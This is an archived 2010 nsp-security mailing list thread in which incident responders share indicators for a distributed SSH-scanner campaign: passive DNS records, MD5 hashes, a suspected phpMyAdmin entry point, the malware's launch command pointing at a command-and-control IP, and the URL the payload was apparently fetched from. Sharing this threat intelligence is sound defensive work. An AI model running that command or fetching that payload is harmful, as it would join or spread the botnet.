[nsp-sec] distributed ssh scanners again

Barry Greene bgreene at senki.org
Wed Nov 3 14:15:54 EDT 2010 

Here is what I'm seeing via pDNS on these two systems:

Found 10 RRs in 0.55 seconds.
 
bos.zt.ua.	A	195.69.220.2
impuls.net.ua.	A	195.69.220.2
impuls.zhitomir.ua.	A	195.69.220.2
impuls.zt.ua.	A	195.69.220.2
ns1.impuls.net.ua.	A	195.69.220.2
test.zt.ua.	A	195.69.220.2
www.kino.zt.ua.	A	195.69.220.2
zhitomir.ua.	A	195.69.220.2
zt.net.ua.	A	195.69.220.2
zt.ua.	A	195.69.220.2

Found 7 RRs in 0.56 seconds.
 
120.fastwebserver.de.	A	217.79.181.30
domainsex.de.	A	217.79.181.30
mail.opel-edv.de.	A	217.79.181.30
mail.testamentsvollstreckungen.net.	A	217.79.181.30
mail.wege-immobilien.de.	A	217.79.181.30
opel-edv.de.	A	217.79.181.30
wege-immobilien.de.	A	217.79.181.30




On Nov 3, 2010, at 9:13 AM, Torsten Voss wrote:

> ----------- nsp-security Confidential --------
> 
> 
> * PGP Signed by an unverified key: 11/3/10 at 9:13:23 AM
> 
> I thought it too, but on the system was no phpmyadmin installed. It is not
> clear which vulnerbility was used.
> 
> Shure, you can share the information with your customers.
> 
> Cheers,
> Torsten
> 
> Am 03.11.2010 17:04, schrieb Smith, Donald:
>> Torsten, is it ok to share the fact that this is probably due to a vulnerable version of phpmyadmin internally and with customers?
>> 
>> 
>> 
>> (coffee != sleep) & (!coffee == sleep)
>> Donald.Smith at qwest.com gcia
>> 
>>> -----Original Message-----
>>> From: nsp-security-bounces at puck.nether.net
>>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
>>> Torsten Voss
>>> Sent: Wednesday, November 03, 2010 9:44 AM
>>> To: nsp-security at puck.nether.net
>>> Subject: Re: [nsp-sec] distributed ssh scanners again
>>> 
>>> ----------- nsp-security Confidential --------
>>> 
>> Hi,
>> 
>> we've recieved the malware from an compromised system:
>> 
>> The malware was started similar then the last one in summer:
>> 
>> PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;/tmp/dd_ssh 300
>> 217.79.190.53 2 2>/dev/null >/dev/null
>> 
>> 217.79.190.53 is probaly the C&C server for the distributed ssh scans
>> 
>> The initial malware was probably downloaded at
>> http://195.69.220.2/a.txt
>> 
>> Three files were found:
>> 60ccf6902bcc37550954383be1461041  barbut
>> 3f25289959d9fecc72cf24d2e300c97b  dd_ssh
>> 30a1e1ae9d573b2daceb71f9ec8c0ce8  dtdss
>> 
>> IP 195.69.220.2 is hardcoded in the dtdss file
>> IP 217.79.181.30 is included in the barbut file
>> 
>> If someone would like a copy, please send us an email.
>> 
>> Kind regards,
>>  Torsten, AS680
>> 
>> 
>>> 
>>> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>>> 
> Please do not Forward, CC, or BCC this E-mail outside of the
> nsp-security
> community. Confidentiality is essential for effective
> Internet security counter-measures.
> _______________________________________________
>>> 
> 
>> This communication is the property of Qwest and may contain confidential or
>> privileged information. Unauthorized use of this communication is strictly
>> prohibited and may be unlawful.  If you have received this communication
>> in error, please immediately notify the sender by reply e-mail and destroy
>> all copies of the communication and any attachments.
> 
> 
> 
> -- 
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
> 
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone  +49 40 808077-590
> Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.:  DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
> 
> Automatische Warnmeldungen               https://www.cert.dfn.de/autowarn
> 
> * Torsten Voss, DFN-CERT <voss at dfn-cert.de>
> * 0x29836EA9 - Unverified(L)
> 
> 
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> 
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________

More information about the nsp-security mailing list